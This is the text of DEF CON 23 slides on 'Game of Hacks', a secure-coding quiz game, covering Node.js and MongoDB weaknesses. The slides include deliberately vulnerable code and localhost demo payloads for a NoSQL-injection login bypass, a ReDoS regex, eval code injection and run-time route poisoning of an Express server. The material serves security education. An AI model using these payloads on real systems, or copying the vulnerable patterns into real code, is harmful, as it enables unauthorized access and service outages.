DEF CON 23 - amit ashbel and maty siman - game of hacks

How we are about to spend your time?
o 3 mins – What is GoH?
o 10 mins – Not so wet T-Shirt contest
o 10 mins – Whats behind it?
o 10 mins – What we learned?
o 10 mins – Vulnerabilities and exploits

Game of Hacks – An idea is born
var mysql = require('db-mysql');
var http = require('http');
var out;
var valTom;
var req = http.request(options, function(res)
{
res.on('data', function(chunk)
{
valTom = chunk;
}
);
}
);
new mysql.Database(
{
hostname: 'localhost', user: 'user', password: 'password', database: 'test'
}
).
connect(function(error)
{
var the_Query = "INSERT INTO Customers (
….
Spot The
Vulnerability

CISO Concerns – Education and Awareness
(https://www.owasp.org/images/2/28/Owasp-ciso-report-2013-1.0.pdf

1+1=?
Launched on August 2014
More than 80,000 games were played since

Get your Browsers ready!
Checkmarx@Defcon 23
Turn your mobile devices ON!
Go to: www.kahoot.it

Let’s take a look at the game

Honeypot
o We assumed the game would be attacked
o We might as well learn from it
o Vulnerabilities were left exposed and patched along the
way

GoH Architecture
Server
Client

Timer
o GoH Version 1
• Timer handled by client
• User forced to go to next question when time ends
• Client sends to server Answer + Time spent
o GoH 2
• Time is now computed at the server with
minor traffic influence
o So what?
• Players stopped timer by modifying JS code

Platform security considerations
o Client (JavaScript)
• How do we validate user
names?
o Server
• How do we enforce valid user
names?
• What are valid user names?
o XSS
• DOM based
o Command Injection (Eval)
o DOS
o Plain SQLi
o JSON based SQLi
o Traceless Routing Hijacking
o SSJS Injection
o Weak Client Side Crypto
o ReDOS

Architecture
db.products.insert( { item: "card", qty : 15 } )
db.products.insert( { name: “elephant", size: 1700 } )
db.products.insert
db.products.find
db.products.find() - Find all of them
db.products.find( { qty: 15 }) - Find based on equality
db.products.find( { qty: { $gt: 25 } } ) - Find based on criteria
Data is inserted and stored as JSON
Queries as described using JSON
var obj;
obj.qty=15;
db.products.find(obj)

name = req.query.username;
pass = req.query.password;
db.users.find({username: name, password: pass});
…
If exists ….
Security – User Supplied Data
o Can you spot the vulnerabilities in the code?
o Fix:
15
WRONG!

name = req.query.username;
pass = req.query.password;
db.users.find({username: name, password: pass});
Security – User Supplied Data
16
o What if we use the following query:
db.users.find({username: {$gt, “a”},
password : {$gt, “a”}});

JSON-base SQL Injection
o Node.JS, being a JSON based language, can accept JSON
values for the .find method:
o A user can bypass it by sending
17
http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html
http:///server/page?user[$gt]=a&pass[$gt]=a
db.users.find({username: username, password: password});

DEMO
http://localhost:49090/?user=hi&pass=bye

JSON Based SQL Injection
o You can use the following:
o Then
db.users.find({username: username});
bcrypt.compare(candidatePassword, password, cb);
WRONG!

JSON Based SQLi
o This can lead to Regular Expression Denial of Service through
the {“username”: {“$regex”: “……..}}
db.users.find({username: username});

Re-Dos Demo
http://localhost:49090/?user=admin&pass[$regex]=^(a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|
a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a
|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|
|a|a|a|a|a|a|a|a|a)(d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|
d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d
|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|
d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d|d)$

Conclusions
o Always validate the input length, structure and
permitted characters
o Remember - Node.js is highly sensitive to CPU-
intensive tasks, and there’s a single thread for
user-code

Node.js as a web server
var http = require('http');
var server = http.createServer(function(req, res){
switch (req.method) {
case 'POST' :
var item = '';
req.on('data', function(chunk){
item += chunk;
});
req.on('end', function(){
...
res.end('OKn');
});
break;
case 'GET' :
....
}
});
server.listen(3000);

Node.JS as a webserver
o Recap
• With Node.js there is no web server
• Traditional web-servers (IIS, Tomcat) had strict separation
between the application, the server and the OS
o Run-time Server Poisoning
• Node.js server runs in a single thread, if corrupted, server
behavior can be altered
• Alterations will last for all subsequent requests.
http://lab.cs.ttu.ee/dl93 - Analysis of Node.js platform web application security
Karl Düüna

Eval
o EVALuates a string.
• At the context of the current applicative user within the
context of the application.
• In .net/java, eval can’t control the web server or other users’
threads
o Node.js is server-less so corrupting “current” thread,
harms all users

Express
o Express.js (Wikipedia)
• “a Node.js web application framework, designed for building single-
page, multi-page, and hybrid web applications.”
app.get('/add', function(req,res) {
var data=req.query;
return res.render('index',
{message: eval(req.query.a + '+' + req.query.b)});
}
http://server/add?a=3&b=8
11
Routing
http://localhost:49090/add?a=3&b=8

Server Routing
o Maintained in an ordered list (although called “stack”
by express).
Routing Stack
/Add
/Remove
/page/:id
/ab*d
Func1()
Func2()
Func3()
Func4()
o The stack is accessible in runtime:
app._router.stack
http://localhost:49090/add?a=3&b=JSON.stringify(app._router.stack)

Run-time Server Poisoning
o Stack is accessible in runtime
• both read and write
• we will replace the existing routing with a new one.
o This will affect all users connecting to the system
• No apparent effect on the source code.

Server Routing
o Maintained in an ordered list (although called “stack” by express).
Routing Stack
/Remove
/page/:id
/ab*d
Func1()
Func2()
Func3()
Func4()
/Add/Add
Func5()
app._router.stack.splice(3,1); // remove routing entry
app.get('/add',function(req, res) // add new routing
{
return res.render('index',
{message: req.query.a * req.query.b}
);
});

Server Routing Demo
http://localhost:49090/add?a=3&b=app._router.stack.splice(3,1);app.get(%27/add%27,%20func
tion(req,%20res)%20%7breturn%20res.render(%27index%27,%20%7bmessage:%20req.query.a%
20*%20req.query.b%7d);%7d);

DEF CON 23 - amit ashbel and maty siman - game of hacks

More Related Content

What's hot (20)

Similar to DEF CON 23 - amit ashbel and maty siman - game of hacks (20)

More from Felipe Prado (20)

Recently uploaded (20)

DEF CON 23 - amit ashbel and maty siman - game of hacks